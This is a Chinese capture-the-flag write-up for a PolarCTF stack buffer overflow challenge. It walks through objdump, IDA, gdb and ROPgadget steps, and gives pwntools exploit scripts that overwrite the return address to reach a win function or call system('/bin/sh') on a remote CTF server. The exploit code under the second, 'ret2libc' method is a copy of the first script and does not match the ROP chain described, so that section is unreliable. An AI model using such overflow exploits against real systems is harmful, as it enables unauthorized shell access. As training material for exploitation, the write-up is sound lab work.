【PolarCTF】简单溢出

检查保护，发现NX开启没办法进行ret2shellcode

hahaha是64位程序

使用IDA分析hahaha，发现scanf函数，程序本身自带有/bin/sh，然后继续往下追踪发现有一个fact后面函数，我们可以直接调用fact函数

解法一 直接调用fact函数

可以使用objdump来找到fact的地址

objdump -d -M intel ./hahaha | grep "fact"

也可以通过IDA查看到

然后就是找填充缓冲区长度，这里可以通过IDA直接看，需要0x30个字节

也可以使用gdb自己分析，更准确，有时候IDA的不一定准

先生成字符进行填充

然后查看rbp里面的内容，并计算偏移

# 查看$rbp的内容 pwndbg>x $rbp

这里cyclic算出来的48是十进制的，我们还要转换为十六进制，发现的确实0x30

exp如下

from pwn import * # 1.95.36.136 2084 #io = process('./hahaha') io = remote("1.95.36.136","2128") fact_addr = 0x400596 # rbp长度是8字节，我们还要填充0x8 padding = 0x30 + 0x8 payload = b'A'*padding payload += p64(fact_addr) io.sendline(payload) io.interactive()

解法二 ret2libc

这里我们还可以另外一种方法

我们查询下/bin/sh的位置

ROPgadget --binary hahaha --string '/bin/sh'

/bin/sh的地址为0x499664

也可以通过IDA追踪查看

同样看下偏移

在64位的程序中，程序前6个参数必须依次放在寄存器中(rdi-rsi-rdx-rcx一r8-r9)，栈只存第7个及以后的参数

因此我们需要找pop_rdi_ret，将/bin/sh打入到rdi中，这样后续我们执行system函数的时候，就可以让system函数读取到

ROPgadget --binary hahaha | grep pop

找到pop_rdi_ret可以使用，地址为0x400643

接下来找system地址

objdump -d -M intel ./hahaha | grep "system"

system@plt的地址为0x400460

那我们的exp如下

from pwn import * # 1.95.36.136 2084 #io = process('./hahaha') io = remote("1.95.36.136","2128") fact_addr = 0x400596 # rbp长度是8字节，我们还要填充0x8 padding = 0x30 + 0x8 payload = b'A'*padding payload += p64(fact_addr) io.sendline(payload) io.interactive()

疑问解答

下面是自己和豆包的对话

1、ret2shellcode的攻击手法是什么样的？

2、为什么需要用pop_ret来传递/bin/sh，程序里面已经有为什么不直接使用？

3、我记得有一个情况下是需要直接找到system在动态链接库的真实地址，那种情况是什么？